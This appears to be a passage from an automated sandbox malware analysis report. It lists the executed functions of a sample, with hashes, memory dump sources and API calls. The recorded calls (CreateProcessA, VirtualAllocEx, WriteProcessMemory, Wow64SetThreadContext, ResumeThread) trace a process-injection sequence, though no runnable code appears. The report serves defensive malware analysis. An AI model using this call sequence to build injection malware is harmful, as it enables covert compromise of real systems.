31924->31915 31926 988adf8 DrawTextExW 31925->31926 31928 988addd 31926->31928 31928->31915 31661 15ee700 31662 15ee748 GetModuleHandleW 31661->31662 31663 15ee742 31661->31663 31664 15ee775 31662->31664 31663->31662 31929 15e7a20 31930 15e7a2b 31929->31930 31932 15e7b60 31929->31932 31933 15e7b85 31932->31933 31937 15e8068 31933->31937 31941 15e8078 31933->31941 31938 15e8072 31937->31938 31940 15e817c 31938->31940 31945 15e7cc4 31938->31945 31943 15e809f 31941->31943 31942 15e817c 31942->31942 31943->31942 31944 15e7cc4 CreateActCtxA 31943->31944 31944->31942 31946 15e9108 CreateActCtxA 31945->31946 31948 15e91cb 31946->31948

                                                                                                                Executed Functions

                                                                                                                Function 0ADA0B08 Relevance: .3, Instructions: 335COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2c537b6587a4eca2e3d4c2046eb09dc00f08c871b38903cd889a42224431a581
                                                                                                                • Instruction ID: d1809f4ae9c384f136af8e168b3ca4a357b9b098aea449e191762e02facb348c
                                                                                                                • Opcode Fuzzy Hash: 2c537b6587a4eca2e3d4c2046eb09dc00f08c871b38903cd889a42224431a581
                                                                                                                • Instruction Fuzzy Hash: 07C1EA72B016058FDB29EF75C420BAEB7FAAFD9300F16846DD1468B691DB34E901CB61
                                                                                                                Function 0B2DCA65 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1615 b2dca65-b2dca66 1616 b2dca68-b2dca6a 1615->1616 1617 b2dca72-b2dca75 1615->1617 1618 b2dca6c-b2dca71 1616->1618 1619 b2dca76-b2dcb05 1616->1619 1617->1619 1618->1617 1621 b2dcb3e-b2dcb5e 1619->1621 1622 b2dcb07-b2dcb11 1619->1622 1629 b2dcb97-b2dcbc6 1621->1629 1630 b2dcb60-b2dcb6a 1621->1630 1622->1621 1623 b2dcb13-b2dcb15 1622->1623 1624 b2dcb38-b2dcb3b 1623->1624 1625 b2dcb17-b2dcb21 1623->1625 1624->1621 1627 b2dcb25-b2dcb34 1625->1627 1628 b2dcb23 1625->1628 1627->1627 1631 b2dcb36 1627->1631 1628->1627 1636 b2dcbff-b2dccb9 CreateProcessA 1629->1636 1637 b2dcbc8-b2dcbd2 1629->1637 1630->1629 1632 b2dcb6c-b2dcb6e 1630->1632 1631->1624 1634 b2dcb91-b2dcb94 1632->1634 1635 b2dcb70-b2dcb7a 1632->1635 1634->1629 1638 b2dcb7c 1635->1638 1639 b2dcb7e-b2dcb8d 1635->1639 1650 b2dccbb-b2dccc1 1636->1650 1651 b2dccc2-b2dcd48 1636->1651 1637->1636 1641 b2dcbd4-b2dcbd6 1637->1641 1638->1639 1639->1639 1640 b2dcb8f 1639->1640 1640->1634 1642 b2dcbf9-b2dcbfc 1641->1642 1643 b2dcbd8-b2dcbe2 1641->1643 1642->1636 1645 b2dcbe4 1643->1645 1646 b2dcbe6-b2dcbf5 1643->1646 1645->1646 1646->1646 1648 b2dcbf7 1646->1648 1648->1642 1650->1651 1661 b2dcd58-b2dcd5c 1651->1661 1662 b2dcd4a-b2dcd4e 1651->1662 1664 b2dcd6c-b2dcd70 1661->1664 1665 b2dcd5e-b2dcd62 1661->1665 1662->1661 1663 b2dcd50 1662->1663 1663->1661 1667 b2dcd80-b2dcd84 1664->1667 1668 b2dcd72-b2dcd76 1664->1668 1665->1664 1666 b2dcd64 1665->1666 1666->1664 1670 b2dcd96-b2dcd9d 1667->1670 1671 b2dcd86-b2dcd8c 1667->1671 1668->1667 1669 b2dcd78 1668->1669 1669->1667 1672 b2dcd9f-b2dcdae 1670->1672 1673 b2dcdb4 1670->1673 1671->1670 1672->1673 1675 b2dcdb5 1673->1675 1675->1675
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B2DCCA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID: >U
                                                                                                                • API String ID: 963392458-1280305422
                                                                                                                • Opcode ID: 40b8ae8e286695d9f234d5efa6329c2c5782d62d38a51796d8e0dc19384de92a
                                                                                                                • Instruction ID: 287560494f336f94ef164b9b77d0c27a923b9fcc2fd075f73cb59bfe6d61210d
                                                                                                                • Opcode Fuzzy Hash: 40b8ae8e286695d9f234d5efa6329c2c5782d62d38a51796d8e0dc19384de92a
                                                                                                                • Instruction Fuzzy Hash: 17A15C71D1025ADFDB14CFA8C8817DDBBB2FF48314F1482AAE848A7294DB749985CF91
                                                                                                                Function 0B2DCA70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B2DCCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: f72aa668ea5cf42d06c83855742294cfa26df27f51d36c938f30bb624b961955
                                                                                                                • Instruction ID: 21ab6dd18e097083846651fdabfe800908a88f922f91a4fd5d3b4e5b62500ec4
                                                                                                                • Opcode Fuzzy Hash: f72aa668ea5cf42d06c83855742294cfa26df27f51d36c938f30bb624b961955
                                                                                                                • Instruction Fuzzy Hash: A3915B71D1021ADFDB14CFA8C8817DDBBB2FF48314F1482AAE848A7294DB749985CF91
                                                                                                                Function 015E7CC4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 015E91B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1768186902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_15e0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: a62ad147ef7918606d8a9f7bfa84cf7c54df1e86e1a3085588df60706d616167
                                                                                                                • Instruction ID: cda4eaf3c1b50359ae4868c83c670018d0dd1884b5185c5af23831170c8d7554
                                                                                                                • Opcode Fuzzy Hash: a62ad147ef7918606d8a9f7bfa84cf7c54df1e86e1a3085588df60706d616167
                                                                                                                • Instruction Fuzzy Hash: 9841D2B0C00719DADB28CFA9C8486DDBBF5BF89304F20806AD418AB255DB756985CF90
                                                                                                                Function 0988ADF0 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0988ADDD,?,?), ref: 0988AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777090043.0000000009880000.00000040.00000800.00020000.00000000.sdmp, Offset: 09880000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_9880000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: a61e02a2e71c73f5e06c2e01a30ed1a1693bd9d62fcdf90e6e6613f71074587f
                                                                                                                • Instruction ID: 4240161992bf96ed988c503c806eefbc92a1afd93e32cb2ecf746d911ae39a5d
                                                                                                                • Opcode Fuzzy Hash: a61e02a2e71c73f5e06c2e01a30ed1a1693bd9d62fcdf90e6e6613f71074587f
                                                                                                                • Instruction Fuzzy Hash: 9431FFB5900209AFCB14CF9AD880ADEFBF5FB58320F14842EE819A7710D774A944CFA0
                                                                                                                Function 0B2DC7E1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B2DC878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 55dcbc4f20058430bcbc92065265ea597be98af16d682037bd071ddf09534d10
                                                                                                                • Instruction ID: 29d81afd19ec3473e6d2727dbd053062ced71c61864c005583a7f3ebb3eaeec9
                                                                                                                • Opcode Fuzzy Hash: 55dcbc4f20058430bcbc92065265ea597be98af16d682037bd071ddf09534d10
                                                                                                                • Instruction Fuzzy Hash: 842135B59002599FCF10CFA9C885BEEBFF1FF48310F10882AE959A7250C7789944CB64
                                                                                                                Function 09889F84 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0988ADDD,?,?), ref: 0988AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777090043.0000000009880000.00000040.00000800.00020000.00000000.sdmp, Offset: 09880000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_9880000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 6cd0d416cc0137cd554e24ddbacdc722a3592df580ea861720390a141e713eff
                                                                                                                • Instruction ID: 8dc388c0adb19fb610da8a4fbba71971a90df1e865f73d5aba4d9db74b6dafbf
                                                                                                                • Opcode Fuzzy Hash: 6cd0d416cc0137cd554e24ddbacdc722a3592df580ea861720390a141e713eff
                                                                                                                • Instruction Fuzzy Hash: 793100B19002099FCB14DF9AD884A9EFBF8EF58320F14842EE919A7350D774A944CFA0
                                                                                                                Function 0B2DC8D0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B2DC958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 968250af11767304c41504fb99c8198a488c7bcc94b8002a43c5fb4ad24f0086
                                                                                                                • Instruction ID: 33c4dd4cacc89f6960a4df0ed97a4a34131e681ca50308619b209e501bb54af8
                                                                                                                • Opcode Fuzzy Hash: 968250af11767304c41504fb99c8198a488c7bcc94b8002a43c5fb4ad24f0086
                                                                                                                • Instruction Fuzzy Hash: 7C2155B1910349DFCB10CFA9C880BEEBBF5FF48310F20842AE959A7250C7799945DBA4
                                                                                                                Function 0B2DC7E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B2DC878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 0526f83b06beadd113e6fba43d2b49db0aa414a382f413d977bfb73adb200a6f
                                                                                                                • Instruction ID: e4d33cb601fee1a4b3ad1929acaa54a69736596614395935382866151563bb76
                                                                                                                • Opcode Fuzzy Hash: 0526f83b06beadd113e6fba43d2b49db0aa414a382f413d977bfb73adb200a6f
                                                                                                                • Instruction Fuzzy Hash: C52125B19003599FCF10CFA9C885BDEBBF5FF48310F10882AE959A7250D7789944CBA4
                                                                                                                Function 0B2DC648 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B2DC6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: e8f0181101984bc3f5e6d361cf2596cbd4dbd282da15fe4ec26fd30fbfcce1c9
                                                                                                                • Instruction ID: fa79254d111c101803f1f9049d5a7b7a6c625a99d76ad00d5e8bfc8f45af4849
                                                                                                                • Opcode Fuzzy Hash: e8f0181101984bc3f5e6d361cf2596cbd4dbd282da15fe4ec26fd30fbfcce1c9
                                                                                                                • Instruction Fuzzy Hash: 102137B19042498FDB10CFAAC4857EEBFF5EF88314F14842AD499A7241CB789985CFA4
                                                                                                                Function 0B2DC8D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B2DC958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 49729967fdd508fd13bb5d5c245694a2118a145521a7fb8da7c5920d5185d416
                                                                                                                • Instruction ID: 2cd60d55a89d2cb6b3d9b1655b52db1853ed5f44d6520b8c5f6f041b00f0666a
                                                                                                                • Opcode Fuzzy Hash: 49729967fdd508fd13bb5d5c245694a2118a145521a7fb8da7c5920d5185d416
                                                                                                                • Instruction Fuzzy Hash: A32125B18002599FCB10DFAAC880BEEFBF5FF48320F10842AE559A7250C7389944CBA4
                                                                                                                Function 0B2DC650 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B2DC6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: 0f6837ffdc1c622a0613bb4bbfd62345b94e6aeafd2b515c027bda8f40f4d4ba
                                                                                                                • Instruction ID: 7da2b4c029795d26c9d717ef0359a1b60c6877a35f33fdd854041f51a9e76fbd
                                                                                                                • Opcode Fuzzy Hash: 0f6837ffdc1c622a0613bb4bbfd62345b94e6aeafd2b515c027bda8f40f4d4ba
                                                                                                                • Instruction Fuzzy Hash: AF2118B19102098FDB10DFAAC4857EEBBF4EF88324F14842AD459A7240CB789985CFA5
                                                                                                                Function 0B2DC720 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B2DC796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: f4721721623c2b3f62d78f39621297fd55687a3d69f0ee02fb747b8216ea725c
                                                                                                                • Instruction ID: dfad811bac6ce04e1d0804acb94a2de553a889019f723f75220c22b57df69a23
                                                                                                                • Opcode Fuzzy Hash: f4721721623c2b3f62d78f39621297fd55687a3d69f0ee02fb747b8216ea725c
                                                                                                                • Instruction Fuzzy Hash: 70214A75800249DFDF10DFA9D845BDEBFF9EB48320F108819E559A7250C779A940CFA5
                                                                                                                Function 0B2DFCF3 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B2DFD55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: d3102f3cb772fd283488a9aabbbef6ceb2c8e7d1b9d2fbed4d11c4b9d889157d
                                                                                                                • Instruction ID: 557eef891ce940fe187141d977c8f5e5e8a6765b64f45d836dbdb45add4560b8
                                                                                                                • Opcode Fuzzy Hash: d3102f3cb772fd283488a9aabbbef6ceb2c8e7d1b9d2fbed4d11c4b9d889157d
                                                                                                                • Instruction Fuzzy Hash: 631156B5800289DFCB10DF99D984BDEBFF8FB48314F14845AD4AAA7601C375A944CFA4
                                                                                                                Function 0B2DC728 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B2DC796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: db617593940eee7d9815c431567f8f61caa166b9ac753b27a28737d8da69152b
                                                                                                                • Instruction ID: d416b6cb362fd60fda7501c11bdedd90a1d36f5312a14ea11292da541559cd30
                                                                                                                • Opcode Fuzzy Hash: db617593940eee7d9815c431567f8f61caa166b9ac753b27a28737d8da69152b
                                                                                                                • Instruction Fuzzy Hash: 101137719002499FDF10DFAAC844BDEBFF5EF88324F10841AE559A7250CB75A544CFA4
                                                                                                                Function 0B2DC599 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0B2DC602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: c3489da8db416a6acca9e8a552366a039a5ee613f457a69104440743a80ed739
                                                                                                                • Instruction ID: adf6d3dd5e211d459802aa8806e7b73e3950fae94e387d3a26a4b4549cb31f07
                                                                                                                • Opcode Fuzzy Hash: c3489da8db416a6acca9e8a552366a039a5ee613f457a69104440743a80ed739
                                                                                                                • Instruction Fuzzy Hash: A6115BB1D002498FCB20DFAAC4857EEFFF4EB88324F20841EC459A7250CA355544CFA4
                                                                                                                Function 0B2DC5A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0B2DC602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 96e61369fc52f7f9b07375ce2830f897925a32371d33a7502587274eee38f161
                                                                                                                • Instruction ID: ab0549f6a0cfd883dbe5c3bab2b989a6e6e359b1c1d33a41c31fa69792c476f1
                                                                                                                • Opcode Fuzzy Hash: 96e61369fc52f7f9b07375ce2830f897925a32371d33a7502587274eee38f161
                                                                                                                • Instruction Fuzzy Hash: 471136B1D002498FCB20DFAAC4457EEFFF4EB88324F20842AD459A7250CB75A944CFA4
                                                                                                                Function 015EE700 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015EE766
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1768186902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_15e0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: ef2ad2bd1dcdb6c517598b509d9f041bb700cf40c73399ded088bcc5f5f91aa7
                                                                                                                • Instruction ID: 03681f641858c9117d5ea05eabb14c4027d4b550e9aad48365d35477a54a5f41
                                                                                                                • Opcode Fuzzy Hash: ef2ad2bd1dcdb6c517598b509d9f041bb700cf40c73399ded088bcc5f5f91aa7
                                                                                                                • Instruction Fuzzy Hash: 4F1110B6C003498FDB14CF9AC448ADEFBF8EB88324F10842AD559B7210C375A545CFA1
                                                                                                                Function 0B2D93F8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B2DFD55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 357175e02f79f692fb6e905f02da18767d691dd0747207115bc0fe60920ed9a8
                                                                                                                • Instruction ID: 9f52bd33d899e3c7aaa3a62feaf8d4e1593f3ed666dbaada5a633027aad1a8e0
                                                                                                                • Opcode Fuzzy Hash: 357175e02f79f692fb6e905f02da18767d691dd0747207115bc0fe60920ed9a8
                                                                                                                • Instruction Fuzzy Hash: 3C1136B5800349DFCB10CF89D588BDEFBF8EB48310F10841AE969A7250C375A940CFA4
                                                                                                                Function 0ADA0007 Relevance: .1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bc1b2c51e4586315f82fa098245cf6b37644c537e650a64c1ffea35a55f50a43
                                                                                                                • Instruction ID: 961a2017e01fccdadcb01dad49c5bd23d850b30906233a943b1ee188e276a263
                                                                                                                • Opcode Fuzzy Hash: bc1b2c51e4586315f82fa098245cf6b37644c537e650a64c1ffea35a55f50a43
                                                                                                                • Instruction Fuzzy Hash: 8A418F70E0A294DFCB02CFA5C8586EEBFB4AF5B301F0650A6D095E7292C7744948CF65
                                                                                                                Function 0ADA0040 Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 889d2579a7d5d2340bc2a8b890b6068bddf574fa378d67fae30bec7f7ee159f4
                                                                                                                • Instruction ID: 7c4cf571f794a131f8dd1e7a802e2d090df65a634606602b034db0703d402d7a
                                                                                                                • Opcode Fuzzy Hash: 889d2579a7d5d2340bc2a8b890b6068bddf574fa378d67fae30bec7f7ee159f4
                                                                                                                • Instruction Fuzzy Hash: AD310470E05218DFDB14CFA9D4446FEBBF5BB59301F02946AD456B3240D7748A44CFA8
                                                                                                                Function 0153D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88a723be36e932745371025a033e12219cbff0f2a7752b758b6c9c6c50fa0fc5
                                                                                                                • Instruction ID: 62648113fb14709b79491d605dd1c13f701a4e414074b78b46f7b154b8d56291
                                                                                                                • Opcode Fuzzy Hash: 88a723be36e932745371025a033e12219cbff0f2a7752b758b6c9c6c50fa0fc5
                                                                                                                • Instruction Fuzzy Hash: F121F272604240DFDB06DF58D9C0B2ABFB5FBC8318F64C569E9094F296C336D456CAA2
                                                                                                                Function 0ADA1490 Relevance: .1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e9cfd06cd3bb3d447c9885af2a96ce60092b8f4950d87d7bca41707bb352c490
                                                                                                                • Instruction ID: 8c60447e3821253d5c2fd91d7254119e0328d666c6eb61cd17316884d0c281df
                                                                                                                • Opcode Fuzzy Hash: e9cfd06cd3bb3d447c9885af2a96ce60092b8f4950d87d7bca41707bb352c490
                                                                                                                • Instruction Fuzzy Hash: D62117B5700A019FC364DF29C684A16B7F6FF89610B068669E51AC7BA0DB30FC41CF61
                                                                                                                Function 0154D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
